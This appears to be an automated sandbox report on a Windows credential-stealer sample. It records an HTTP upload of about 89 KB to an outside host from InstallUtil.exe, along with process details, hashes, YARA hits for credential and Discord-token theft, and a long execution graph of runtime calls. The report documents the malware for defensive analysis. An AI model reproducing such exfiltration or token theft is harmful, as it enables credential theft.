                                              Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZH","regionName":"Zurich","city":"Zurich","zip":"8040","lat":47.3682,"lon":8.5671,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"Datacamp Limited","as":"AS212238 Datacamp Limited","query":"84.17.52.45"}


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              1192.168.2.74970885.192.63.1945001C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              TimestampkBytes transferredDirectionData
                                              May 24, 2023 14:10:31.641706944 CEST183OUTPOST /uploadfile HTTP/1.1
                                              Content-Type: multipart/form-data; boundary="d93d91ad-9e20-4217-96c8-9bc98e4c52bc"
                                              Host: 85.192.63.194:5001
                                              Content-Length: 89557
                                              Expect: 100-continue
                                              Connection: Keep-Alive
                                              May 24, 2023 14:10:31.674005032 CEST183INHTTP/1.1 100 Continue
                                              May 24, 2023 14:10:31.706753016 CEST196INHTTP/1.1 100 Continue
                                              May 24, 2023 14:10:32.203778982 CEST273INHTTP/1.1 200 OK
                                              Server: Werkzeug/2.2.3 Python/3.10.6
                                              Date: Wed, 24 May 2023 12:10:32 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Content-Length: 2
                                              Connection: close


                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Click to jump to process

                                              Target ID:0
                                              Start time:14:09:44
                                              Start date:24/05/2023
                                              Path:C:\Users\user\Desktop\file.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\Desktop\file.exe
                                              Imagebase:0x1a0000
                                              File size:1219328 bytes
                                              MD5 hash:2DF2884B8B1A86FA61343EA81352EC77
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low

                                              Target ID:1
                                              Start time:14:09:44
                                              Start date:24/05/2023
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Target ID:2
                                              Start time:14:09:45
                                              Start date:24/05/2023
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              Imagebase:0x990000
                                              File size:41064 bytes
                                              MD5 hash:EFEC8C379D165E3F33B536739AEE26A3
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.449788785.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000002.00000002.449788785.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                              Reputation:high

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:6.5%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:2.6%
                                                Total number of Nodes:2000
                                                Total number of Limit Nodes:79
                                                execution_graph 20103 1b961b 20104 1b9628 20103->20104 20105 1b9640 20103->20105 20106 1aff41 __strnicoll 14 API calls 20104->20106 20109 1b969f 20105->20109 20110 1b9dc0 _Ungetc 14 API calls 20105->20110 20117 1b9638 20105->20117 20107 1b962d 20106->20107 20108 1afe43 __strnicoll 44 API calls 20107->20108 20108->20117 20111 1b738b _Ungetc 44 API calls 20109->20111 20110->20109 20112 1b96b8 20111->20112 20123 1bb958 20112->20123 20115 1b738b _Ungetc 44 API calls 20116 1b96f1 20115->20116 20116->20117 20118 1b738b _Ungetc 44 API calls 20116->20118 20119 1b96ff 20118->20119 20119->20117 20120 1b738b _Ungetc 44 API calls 20119->20120 20121 1b970d 20120->20121 20122 1b738b _Ungetc 44 API calls 20121->20122 20122->20117 20124 1bb964 ___scrt_is_nonwritable_in_current_image 20123->20124 20125 1bb96c 20124->20125 20126 1bb984 20124->20126 20128 1aff2e __dosmaperr 14 API calls 20125->20128 20127 1bba41 20126->20127 20131 1bb9ba 20126->20131 20129 1aff2e __dosmaperr 14 API calls 20127->20129 20130 1bb971 20128->20130 20132 1bba46 20129->20132 20133 1aff41 __strnicoll 14 API calls 20130->20133 20134 1bb9d8 20131->20134 20135 1bb9c3 20131->20135 20136 1aff41 __strnicoll 14 API calls 20132->20136 20137 1b96c0 20133->20137 20153 1bf69a EnterCriticalSection 20134->20153 20138 1aff2e __dosmaperr 14 API calls 20135->20138 20147 1bb9d0 20136->20147 20137->20115 20137->20117 20140 1bb9c8 20138->20140 20142 1aff41 __strnicoll 14 API calls 20140->20142 20141 1bb9de 20143 1bb9fa 20141->20143 20144 1bba0f 20141->20144 20142->20147 20148 1aff41 __strnicoll 14 API calls 20143->20148 20154 1bba6c 20144->20154 20145 1afe43 __strnicoll 44 API calls 20145->20137 20147->20145 20150 1bb9ff 20148->20150 20149 1bba0a 20217 1bba39 20149->20217 20151 1aff2e __dosmaperr 14 API calls 20150->20151 20151->20149 20153->20141 20155 1bba7e 20154->20155 20156 1bba96 20154->20156 20158 1aff2e __dosmaperr 14 API calls 20155->20158 20157 1bbdec 20156->20157 20163 1bbadc 20156->20163 20160 1aff2e __dosmaperr 14 API calls 20157->20160 20159 1bba83 20158->20159 20161 1aff41 __strnicoll 14 API calls 20159->20161 20162 1bbdf1 20160->20162 20164 1bba8b 20161->20164 20165 1aff41 __strnicoll 14 API calls 20162->20165 20163->20164 20166 1bbae7 20163->20166 20172 1bbb17 20163->20172 20164->20149 20167 1bbaf4 20165->20167 20168 1aff2e __dosmaperr 14 API calls 20166->20168 20170 1afe43 __strnicoll 44 API calls 20167->20170 20169 1bbaec 20168->20169 20171 1aff41 __strnicoll 14 API calls 20169->20171 20170->20164 20171->20167 20173 1bbb30 20172->20173 20174 1bbb4a 20172->20174 20176 1bbb7b 20172->20176 20173->20174 20179 1bbb35 20173->20179 20175 1aff2e __dosmaperr 14 API calls 20174->20175 20177 1bbb4f 20175->20177 20178 1b6429 __strnicoll 15 API calls 20176->20178 20181 1aff41 __strnicoll 14 API calls 20177->20181 20180 1bbb8c 20178->20180 20226 1c39ca 20179->20226 20183 1b63ef ___free_lconv_mon 14 API calls 20180->20183 20184 1bbb56 20181->20184 20186 1bbb95 20183->20186 20187 1afe43 __strnicoll 44 API calls 20184->20187 20185 1bbcc8 20188 1bbd3c 20185->20188 20191 1bbce1 GetConsoleMode 20185->20191 20189 1b63ef ___free_lconv_mon 14 API calls 20186->20189 20216 1bbb61 __fread_nolock 20187->20216 20190 1bbd40 ReadFile 20188->20190 20192 1bbb9c 20189->20192 20193 1bbd58 20190->20193 20194 1bbdb4 GetLastError 20190->20194 20191->20188 20195 1bbcf2 20191->20195 20196 1bbbc1 20192->20196 20197 1bbba6 20192->20197 20193->20194 20200 1bbd31 20193->20200 20198 1bbd18 20194->20198 20199 1bbdc1 20194->20199 20195->20190 20201 1bbcf8 ReadConsoleW 20195->20201 20220 1bb434 20196->20220 20203 1aff41 __strnicoll 14 API calls 20197->20203 20198->20216 20235 1afee7 20198->20235 20205 1aff41 __strnicoll 14 API calls 20199->20205 20212 1bbd7d 20200->20212 20213 1bbd94 20200->20213 20200->20216 20201->20200 20206 1bbd12 GetLastError 20201->20206 20202 1b63ef ___free_lconv_mon 14 API calls 20202->20164 20208 1bbbab 20203->20208 20209 1bbdc6 20205->20209 20206->20198 20210 1aff2e __dosmaperr 14 API calls 20208->20210 20211 1aff2e __dosmaperr 14 API calls 20209->20211 20210->20216 20211->20216 20240 1bb786 20212->20240 20213->20216 20253 1bb5de 20213->20253 20216->20202 20265 1bf6bd LeaveCriticalSection 20217->20265 20219 1bba3f 20219->20137 20221 1bb448 _Fputc 20220->20221 20222 1bb353 __fread_nolock 46 API calls 20221->20222 20223 1bb45d 20222->20223 20224 1aeab0 _Fputc 44 API calls 20223->20224 20225 1bb46c 20224->20225 20225->20179 20227 1c39e4 20226->20227 20228 1c39d7 20226->20228 20230 1c39f0 20227->20230 20231 1aff41 __strnicoll 14 API calls 20227->20231 20229 1aff41 __strnicoll 14 API calls 20228->20229 20232 1c39dc 20229->20232 20230->20185 20233 1c3a11 20231->20233 20232->20185 20234 1afe43 __strnicoll 44 API calls 20233->20234 20234->20232 20236 1aff2e __dosmaperr 14 API calls 20235->20236 20237 1afef2 __dosmaperr 20236->20237 20238 1aff41 __strnicoll 14 API calls 20237->20238 20239 1aff05 20238->20239 20239->20216 20259 1bb492 20240->20259 20243 1bdcc5 __strnicoll MultiByteToWideChar 20244 1bb89a 20243->20244 20247 1bb8a3 GetLastError 20244->20247 20250 1bb7ce 20244->20250 20245 1bb828 20251 1bb7e2 20245->20251 20252 1bb434 __fread_nolock 46 API calls 20245->20252 20246 1bb818 20248 1aff41 __strnicoll 14 API calls 20246->20248 20249 1afee7 __dosmaperr 14 API calls 20247->20249 20248->20250 20249->20250 20250->20216 20251->20243 20252->20251 20254 1bb615 20253->20254 20255 1bb6a5 20254->20255 20256 1bb6aa ReadFile 20254->20256 20255->20216 20256->20255 20257 1bb6c7 20256->20257 20257->20255 20258 1bb434 __fread_nolock 46 API calls 20257->20258 20258->20255 20260 1bb4c6 20259->20260 20261 1bb535 ReadFile 20260->20261 20262 1bb530 20260->20262 20261->20262 20263 1bb54e 20261->20263 20262->20245 20262->20246 20262->20250 20262->20251 20263->20262 20264 1bb434 __fread_nolock 46 API calls 20263->20264 20264->20262 20265->20219 20266 1a101b 20269 1a9a41 20266->20269 20272 1a9a14 20269->20272 20273 1a9a2a 20272->20273 20274 1a9a23 20272->20274 20281 1b5a2f 20273->20281 20278 1b59b2 20274->20278 20277 1a1020 20279 1b5a2f 47 API calls 20278->20279 20280 1b59c4 20279->20280 20280->20277 20284 1b577b 20281->20284 20285 1b5787 ___scrt_is_nonwritable_in_current_image 20284->20285 20292 1aff95 EnterCriticalSection 20285->20292 20287 1b5795 20293 1b57d6 20287->20293 20289 1b57a2 20303 1b57ca 20289->20303 20292->20287 20294 1b57f1 20293->20294 20295 1b5864 std::_Lockit::_Lockit 20293->20295 20294->20295 20296 1b5844 20294->20296 20306 1c1aad 20294->20306 20295->20289 20296->20295 20298 1c1aad 47 API calls 20296->20298 20300 1b585a 20298->20300 20299 1b583a 20301 1b63ef ___free_lconv_mon 14 API calls 20299->20301 20302 1b63ef ___free_lconv_mon 14 API calls 20300->20302 20301->20296 20302->20295 20334 1affdd LeaveCriticalSection 20303->20334 20305 1b57b3 20305->20277 20307 1c1aba 20306->20307 20308 1c1ad5 20306->20308 20307->20308 20309 1c1ac6 20307->20309 20310 1c1ae4 20308->20310 20315 1c50ff 20308->20315 20311 1aff41 __strnicoll 14 API calls 20309->20311 20322 1bc5b5 20310->20322 20314 1c1acb codecvt 20311->20314 20314->20299 20316 1c511f HeapSize 20315->20316 20317 1c510a 20315->20317 20316->20310 20318 1aff41 __strnicoll 14 API calls 20317->20318 20319 1c510f 20318->20319 20320 1afe43 __strnicoll 44 API calls 20319->20320 20321 1c511a 20320->20321 20321->20310 20323 1bc5cd 20322->20323 20324 1bc5c2 20322->20324 20326 1bc5d5 20323->20326 20333 1bc5de __Getctype 20323->20333 20325 1b6429 __strnicoll 15 API calls 20324->20325 20327 1bc5ca 20325->20327 20328 1b63ef ___free_lconv_mon 14 API calls 20326->20328 20327->20314 20328->20327 20329 1bc608 HeapReAlloc 20329->20327 20329->20333 20330 1bc5e3 20331 1aff41 __strnicoll 14 API calls 20330->20331 20331->20327 20332 1b3362 codecvt 2 API calls 20332->20333 20333->20329 20333->20330 20333->20332 20334->20305 20479 1a3000 20480 1a3034 20479->20480 20485 1a3cf0 20480->20485 20483 1a9545 CatchGuardHandler 5 API calls 20484 1a3061 20483->20484 20486 1a3d1f 20485->20486 20487 1a53d0 75 API calls 20486->20487 20488 1a3d7f 20487->20488 20513 1a2eb0 20488->20513 20492 1a3fb3 20497 1a3c60 73 API calls 20492->20497 20493 1a3f24 20495 1a3f2b 20493->20495 20496 1a3f6f 20493->20496 20494 1a3eeb 20494->20492 20494->20493 20557 1a3c60 20495->20557 20498 1a3c60 73 API calls 20496->20498 20499 1a3f6a 20497->20499 20498->20499 20500 1a3c60 73 API calls 20499->20500 20511 1a4009 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 20500->20511 20502 1a40d0 20561 1a49f0 20502->20561 20503 1a3de5 codecvt 20503->20494 20503->20502 20542 1a56a0 20503->20542 20505 1a40d5 20507 1afe53 std::ios_base::_Init 44 API calls 20505->20507 20508 1a40da 20507->20508 20509 1a40b2 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 20510 1a9545 CatchGuardHandler 5 API calls 20509->20510 20512 1a304b 20510->20512 20511->20505 20511->20509 20512->20483 20514 1a2edc 20513->20514 20515 1a2fa7 20513->20515 20517 1a2ee9 20514->20517 20519 1a2f28 20514->20519 20520 1a2f41 20514->20520 20516 1a13f0 std::ios_base::_Init 46 API calls 20515->20516 20518 1a2fac 20516->20518 20523 1a5170 20517->20523 20564 1a5e30 20519->20564 20522 1a5e30 46 API calls 20520->20522 20522->20517 20524 1a612a std::_Lockit::_Lockit 7 API calls 20523->20524 20525 1a5195 20524->20525 20526 1a612a std::_Lockit::_Lockit 7 API calls 20525->20526 20530 1a51d4 20525->20530 20527 1a51b3 20526->20527 20531 1a6182 std::_Lockit::~_Lockit 2 API calls 20527->20531 20528 1a6182 std::_Lockit::~_Lockit 2 API calls 20529 1a5252 20528->20529 20532 1a9545 CatchGuardHandler 5 API calls 20529->20532 20533 1a5215 20530->20533 20579 1a59a0 20530->20579 20531->20530 20534 1a5263 20532->20534 20533->20528 20534->20503 20537 1a522f 20539 1a644b std::_Facet_Register 16 API calls 20537->20539 20538 1a5267 20540 1a1910 46 API calls 20538->20540 20539->20533 20541 1a526c 20540->20541 20543 1a57d7 20542->20543 20548 1a56c3 20542->20548 20544 1a13f0 std::ios_base::_Init 46 API calls 20543->20544 20555 1a572a 20544->20555 20545 1a56d8 20547 1a57d2 20545->20547 20549 1a5724 20545->20549 20546 1afe53 std::ios_base::_Init 44 API calls 20551 1a57e1 20546->20551 20550 1a1370 std::ios_base::_Init 46 API calls 20547->20550 20548->20545 20548->20547 20552 1a5744 20548->20552 20553 1a9553 codecvt 16 API calls 20549->20553 20550->20543 20554 1a9553 codecvt 16 API calls 20552->20554 20552->20555 20553->20555 20554->20555 20555->20546 20556 1a57a3 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 20555->20556 20556->20503 20558 1a3c7c 20557->20558 20559 1a3cd1 20557->20559 20558->20559 20560 1a71dc 73 API calls 20558->20560 20559->20499 20560->20558 20660 1a62d1 20561->20660 20565 1a5e7b 20564->20565 20566 1a5e3b 20564->20566 20567 1a1370 std::ios_base::_Init 46 API calls 20565->20567 20568 1a5e66 20566->20568 20569 1a5e44 20566->20569 20577 1a5e51 20567->20577 20570 1a5e76 20568->20570 20572 1a9553 codecvt 16 API calls 20568->20572 20569->20565 20571 1a5e4b 20569->20571 20570->20517 20574 1a9553 codecvt 16 API calls 20571->20574 20575 1a5e70 20572->20575 20573 1afe53 std::ios_base::_Init 44 API calls 20576 1a5e85 20573->20576 20574->20577 20575->20517 20577->20573 20578 1a5e5a 20577->20578 20578->20517 20580 1a59ce 20579->20580 20581 1a5c80 20579->20581 20580->20581 20584 1a9553 codecvt 16 API calls 20580->20584 20582 1a9545 CatchGuardHandler 5 API calls 20581->20582 20583 1a5227 20582->20583 20583->20537 20583->20538 20585 1a59de 20584->20585 20586 1a612a std::_Lockit::_Lockit 7 API calls 20585->20586 20587 1a5a11 20586->20587 20588 1a5a5b 20587->20588 20589 1a5c99 20587->20589 20590 1a657d std::_Locinfo::_Locinfo_ctor 72 API calls 20588->20590 20591 1a62f1 codecvt 46 API calls 20589->20591 20592 1a5a66 20590->20592 20593 1a5ca3 20591->20593 20626 1afae1 20592->20626 20655 1a6294 20593->20655 20598 1a8eaf codecvt 44 API calls 20599 1a5a82 20598->20599 20600 1a8eaf codecvt 44 API calls 20599->20600 20601 1a5ad3 __Getctype 20600->20601 20601->20593 20602 1a5aea 20601->20602 20631 1a1bd0 20602->20631 20604 1a5b04 20605 1a1bd0 23 API calls 20604->20605 20606 1a5b1e 20605->20606 20645 1a5f74 20606->20645 20608 1a5b6a 20609 1a5f74 16 API calls 20608->20609 20610 1a5bbf 20609->20610 20611 1a65c8 std::_Locinfo::_Locinfo_dtor 71 API calls 20610->20611 20612 1a5bde 20611->20612 20613 1afb09 ___std_exception_destroy 14 API calls 20612->20613 20616 1a5bef 20612->20616 20613->20616 20627 1b782a __Getctype 44 API calls 20626->20627 20628 1afaec 20627->20628 20629 1b6477 __Getctype 44 API calls 20628->20629 20630 1a5a78 20629->20630 20630->20598 20634 1a1c03 20631->20634 20632 1a1c44 __Getctype 20635 1a1cb0 20632->20635 20644 1a1c5c 20632->20644 20633 1a5f74 16 API calls 20633->20634 20634->20632 20634->20633 20636 1a6294 Concurrency::cancel_current_task RaiseException 20635->20636 20638 1a1cb5 20636->20638 20637 1a1c95 20639 1a9545 CatchGuardHandler 5 API calls 20637->20639 20659 1a8c99 GetStringTypeW 20638->20659 20642 1a1cac 20639->20642 20641 1a5f74 16 API calls 20641->20644 20642->20604 20643 1a1ccd 20643->20604 20644->20637 20644->20641 20646 1a5f7e 20645->20646 20647 1a5f82 20645->20647 20646->20608 20648 1a606e MultiByteToWideChar 20647->20648 20649 1a602b 20647->20649 20650 1a5fbe 20647->20650 20651 1a5f8c 20647->20651 20648->20651 20652 1a5fc8 20648->20652 20649->20651 20654 1a6054 MultiByteToWideChar 20649->20654 20650->20648 20650->20652 20651->20608 20652->20651 20653 1aff41 __strnicoll 14 API calls 20652->20653 20653->20651 20654->20651 20654->20652 20656 1a62a2 Concurrency::cancel_current_task 20655->20656 20657 1aa3e0 CallUnexpected RaiseException 20656->20657 20658 1a62b0 20657->20658 20659->20643 20665 1a6229 20660->20665 20663 1aa3e0 CallUnexpected RaiseException 20664 1a62f0 20663->20664 20666 1a1270 std::invalid_argument::invalid_argument 45 API calls 20665->20666 20667 1a623b 20666->20667 20667->20663 20795 1a863a 20796 1a8646 __EH_prolog3_GS 20795->20796 20799 1a86ac 20796->20799 20800 1a8693 20796->20800 20803 1a865d 20796->20803 20814 1b100d 20799->20814 20811 1a7a45 20800->20811 20856 1a9a6a 20803->20856 20806 1a8784 20807 1a876b 20806->20807 20838 1b1abd 20806->20838 20851 1a2fb0 20807->20851 20808 1a86cb 20808->20806 20808->20807 20810 1b100d 46 API calls 20808->20810 20834 1a7386 20808->20834 20810->20808 20812 1b100d 46 API calls 20811->20812 20813 1a7a50 20812->20813 20813->20803 20815 1b1019 ___scrt_is_nonwritable_in_current_image 20814->20815 20816 1b103b 20815->20816 20817 1b1023 20815->20817 20859 1b040d EnterCriticalSection 20816->20859 20818 1aff41 __strnicoll 14 API calls 20817->20818 20820 1b1028 20818->20820 20823 1afe43 __strnicoll 44 API calls 20820->20823 20821 1b1045 20822 1b10e1 20821->20822 20824 1b738b _Ungetc 44 API calls 20821->20824 20860 1b0fc6 20822->20860 20833 1b1033 _Fputc 20823->20833 20829 1b1062 20824->20829 20826 1b10e7 20867 1b1111 20826->20867 20828 1b10b9 20830 1aff41 __strnicoll 14 API calls 20828->20830 20829->20822 20829->20828 20831 1b10be 20830->20831 20832 1afe43 __strnicoll 44 API calls 20831->20832 20832->20833 20833->20808 20835 1a73ad 20834->20835 20837 1a7392 20834->20837 20871 1a66db 20835->20871 20837->20808 20839 1b1ac9 ___scrt_is_nonwritable_in_current_image 20838->20839 20840 1b1ad0 20839->20840 20841 1b1ae5 20839->20841 20842 1aff41 __strnicoll 14 API calls 20840->20842 20888 1b040d EnterCriticalSection 20841->20888 20844 1b1ad5 20842->20844 20846 1afe43 __strnicoll 44 API calls 20844->20846 20845 1b1aef 20889 1b19c4 20845->20889 20848 1b1ae0 20846->20848 20848->20806 20852 1a2fbb 20851->20852 20853 1a2fd6 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 20851->20853 20852->20853 20854 1afe53 std::ios_base::_Init 44 API calls 20852->20854 20853->20803 20855 1a2ffa 20854->20855 20857 1a9545 CatchGuardHandler 5 API calls 20856->20857 20858 1a9a74 20857->20858 20858->20858 20859->20821 20861 1b0fd2 20860->20861 20865 1b0fe7 __fread_nolock 20860->20865 20862 1aff41 __strnicoll 14 API calls 20861->20862 20863 1b0fd7 20862->20863 20864 1afe43 __strnicoll 44 API calls 20863->20864 20866 1b0fe2 20864->20866 20865->20826 20866->20826 20870 1b0421 LeaveCriticalSection 20867->20870 20869 1b1117 20869->20833 20870->20869 20872 1a6776 20871->20872 20874 1a66fa 20871->20874 20873 1a13f0 std::ios_base::_Init 46 API calls 20872->20873 20875 1a677b 20873->20875 20878 1a5f30 20874->20878 20877 1a6716 codecvt 20877->20837 20879 1a5f3b 20878->20879 20880 1a5f4c 20878->20880 20881 1a1370 codecvt 20879->20881 20882 1a5f46 20879->20882 20880->20877 20884 1aa3e0 CallUnexpected RaiseException 20881->20884 20883 1a9553 codecvt 16 API calls 20882->20883 20883->20880 20885 1a138a 20884->20885 20886 1aa33b ___std_exception_copy 45 API calls 20885->20886 20887 1a13b1 20886->20887 20887->20877 20888->20845 20890 1b19dc 20889->20890 20892 1b1a4c 20889->20892 20891 1b738b _Ungetc 44 API calls 20890->20891 20898 1b19e2 20891->20898 20893 1b9dc0 _Ungetc 14 API calls 20892->20893 20894 1b1a44 20892->20894 20893->20894 20900 1b1b28 20894->20900 20895 1b1a34 20896 1aff41 __strnicoll 14 API calls 20895->20896 20897 1b1a39 20896->20897 20899 1afe43 __strnicoll 44 API calls 20897->20899 20898->20892 20898->20895 20899->20894 20903 1b0421 LeaveCriticalSection 20900->20903 20902 1b1b2e 20902->20848 20903->20902 21130 1a845f 21131 1a8473 21130->21131 21137 1a84ce 21131->21137 21138 1a7e6d 21131->21138 21134 1a84bb 21134->21137 21150 1b1119 21134->21150 21141 1a7e87 21138->21141 21143 1a7ed6 21138->21143 21139 1a9545 CatchGuardHandler 5 API calls 21140 1a7eed 21139->21140 21140->21134 21140->21137 21144 1b148a 21140->21144 21142 1b178c 72 API calls 21141->21142 21141->21143 21142->21143 21143->21139 21145 1b149d _Fputc 21144->21145 21164 1b1229 21145->21164 21148 1aeab0 _Fputc 44 API calls 21149 1b14bf 21148->21149 21149->21134 21151 1b1139 21150->21151 21152 1b1124 21150->21152 21154 1b1141 21151->21154 21155 1b1156 21151->21155 21153 1aff41 __strnicoll 14 API calls 21152->21153 21158 1b1129 21153->21158 21156 1aff41 __strnicoll 14 API calls 21154->21156 21196 1bb1ec 21155->21196 21159 1b1146 21156->21159 21161 1afe43 __strnicoll 44 API calls 21158->21161 21162 1afe43 __strnicoll 44 API calls 21159->21162 21160 1b1151 21160->21137 21163 1b1134 21161->21163 21162->21160 21163->21137 21167 1b1235 ___scrt_is_nonwritable_in_current_image 21164->21167 21165 1b123b 21168 1afdc6 _Fputc 29 API calls 21165->21168 21166 1b126f 21175 1b040d EnterCriticalSection 21166->21175 21167->21165 21167->21166 21170 1b1256 21168->21170 21170->21148 21171 1b127b 21176 1b139e 21171->21176 21173 1b1292 21185 1b12bb 21173->21185 21175->21171 21177 1b13b1 21176->21177 21178 1b13c4 21176->21178 21177->21173 21188 1b12c5 21178->21188 21180 1b1475 21180->21173 21181 1b13e7 21181->21180 21182 1b0e9a ___scrt_uninitialize_crt 69 API calls 21181->21182 21183 1b1415 21182->21183 21192 1bb474 21183->21192 21195 1b0421 LeaveCriticalSection 21185->21195 21187 1b12c3 21187->21170 21189 1b12d6 21188->21189 21191 1b132e 21188->21191 21190 1bb434 __fread_nolock 46 API calls 21189->21190 21189->21191 21190->21191 21191->21181 21193 1bb353 __fread_nolock 46 API calls 21192->21193 21194 1bb48d 21193->21194 21194->21180 21195->21187 21197 1bb200 _Fputc 21196->21197 21202 1bac00 21197->21202 21200 1aeab0 _Fputc 44 API calls 21201 1bb21a 21200->21201 21201->21160 21203 1bac0c ___scrt_is_nonwritable_in_current_image 21202->21203 21204 1bac13 21203->21204 21205 1bac36 21203->21205 21206 1afdc6 _Fputc 29 API calls 21204->21206 21213 1b040d EnterCriticalSection 21205->21213 21209 1bac2c 21206->21209 21208 1bac44 21214 1bac8f 21208->21214 21209->21200 21211 1bac53 21227 1bac85 21211->21227 21213->21208 21215 1bac9e 21214->21215 21216 1bacc6 21214->21216 21218 1afdc6 _Fputc 29 API calls 21215->21218 21217 1b738b _Ungetc 44 API calls 21216->21217 21219 1baccf 21217->21219 21224 1bacb9 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 21218->21224 21230 1bb416 21219->21230 21222 1bad79 21233 1baff0 21222->21233 21224->21211 21225 1bad90 21225->21224 21245 1bae30 21225->21245 21252 1b0421 LeaveCriticalSection 21227->21252 21229 1bac8d 21229->21209 21231 1bb22d 48 API calls 21230->21231 21232 1baced 21231->21232 21232->21222 21232->21224 21232->21225 21234 1bafff ___scrt_uninitialize_crt 21233->21234 21235 1b738b _Ungetc 44 API calls 21234->21235 21237 1bb01b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 21235->21237 21236 1a9545 CatchGuardHandler 5 API calls 21238 1bb199 21236->21238 21239 1bb416 48 API calls 21237->21239 21241 1bb027 21237->21241 21238->21224 21240 1bb07b 21239->21240 21240->21241 21242 1bb0ad ReadFile 21240->21242 21241->21236 21242->21241 21243 1bb0d4 21242->21243 21244 1bb416 48 API calls 21243->21244 21244->21241 21246 1b738b _Ungetc 44 API calls 21245->21246 21247 1bae43 21246->21247 21248 1bb416 48 API calls 21247->21248 21251 1bae8b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 21247->21251 21249 1baede 21248->21249 21250 1bb416 48 API calls 21249->21250 21249->21251 21250->21251 21251->21224 21252->21229 22976 1a754d 22977 1a755c 22976->22977 22979 1a7580 22977->22979 22980 1b198a 22977->22980 22981 1b199d _Fputc 22980->22981 22986 1b18c1 22981->22986 22983 1b19b2 22984 1aeab0 _Fputc 44 API calls 22983->22984 22985 1b19bf 22984->22985 22985->22979 22987 1b18d3 22986->22987 22989 1b18f6 22986->22989 22988 1afdc6 _Fputc 29 API calls 22987->22988 22990 1b18ee 22988->22990 22989->22987 22991 1b191d 22989->22991 22990->22983 22994 1b17c6 22991->22994 22995 1b17d2 ___scrt_is_nonwritable_in_current_image 22994->22995 23002 1b040d EnterCriticalSection 22995->23002 22997 1b17e0 23003 1b1821 22997->23003 22999 1b17ed 23012 1b1815 22999->23012 23002->22997 23004 1b0e9a ___scrt_uninitialize_crt 69 API calls 23003->23004 23005 1b183c 23004->23005 23006 1b95db 14 API calls 23005->23006 23007 1b1846 23006->23007 23008 1b6392 __Getctype 14 API calls 23007->23008 23011 1b1861 23007->23011 23009 1b1885 23008->23009 23010 1b63ef ___free_lconv_mon 14 API calls 23009->23010 23010->23011 23011->22999 23015 1b0421 LeaveCriticalSection 23012->23015 23014 1b17fe 23014->22983 23015->23014 21550 1a6e45 21551 1a6e98 21550->21551 21552 1a6e4c 21550->21552 21555 1b040d EnterCriticalSection 21552->21555 21554 1a6e51 21555->21554 23042 1b037b 23043 1b0f68 ___scrt_uninitialize_crt 73 API calls 23042->23043 23044 1b0383 23043->23044 23052 1b9530 23044->23052 23046 1b0388 23047 1b95db 14 API calls 23046->23047 23048 1b0397 DeleteCriticalSection 23047->23048 23048->23046 23049 1b03b2 23048->23049 23050 1b63ef ___free_lconv_mon 14 API calls 23049->23050 23051 1b03bd 23050->23051 23053 1b953c ___scrt_is_nonwritable_in_current_image 23052->23053 23062 1aff95 EnterCriticalSection 23053->23062 23055 1b9547 23056 1b95b3 23055->23056 23058 1b9587 DeleteCriticalSection 23055->23058 23060 1b0c2d 74 API calls 23055->23060 23063 1b95d2 23056->23063 23061 1b63ef ___free_lconv_mon 14 API calls 23058->23061 23060->23055 23061->23055 23062->23055 23066 1affdd LeaveCriticalSection 23063->23066 23065 1b95bf 23065->23046 23066->23065 18060 1a9679 18061 1a9685 ___scrt_is_nonwritable_in_current_image 18060->18061 18086 1a987b 18061->18086 18063 1a968c 18064 1a97e5 18063->18064 18074 1a96b6 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock std::locale::_Setgloballocale 18063->18074 18132 1aa085 IsProcessorFeaturePresent 18064->18132 18066 1a97ec 18112 1b3f46 18066->18112 18071 1a96d5 18073 1a975c 18101 1a2c20 18073->18101 18074->18071 18076 1a9756 18074->18076 18115 1b3f20 18074->18115 18097 1b3b84 18076->18097 18087 1a9884 18086->18087 18139 1a9b4c IsProcessorFeaturePresent 18087->18139 18091 1a9895 18092 1a9899 18091->18092 18149 1b5b5d 18091->18149 18092->18063 18095 1a98b0 18095->18063 18098 1b3b8d 18097->18098 18099 1b3b92 18097->18099 18466 1b38de 18098->18466 18099->18073 18839 1a9553 18101->18839 18103 1a2c32 18847 1a4a00 18103->18847 19560 1b3d2e 18112->19560 18116 1b3f36 ___scrt_is_nonwritable_in_current_image std::_Lockit::_Lockit 18115->18116 18116->18076 18117 1b782a __Getctype 44 API calls 18116->18117 18120 1b5c0f 18117->18120 18118 1b2db9 CallUnexpected 44 API calls 18119 1b5c39 18118->18119 18120->18118 18133 1aa09b codecvt 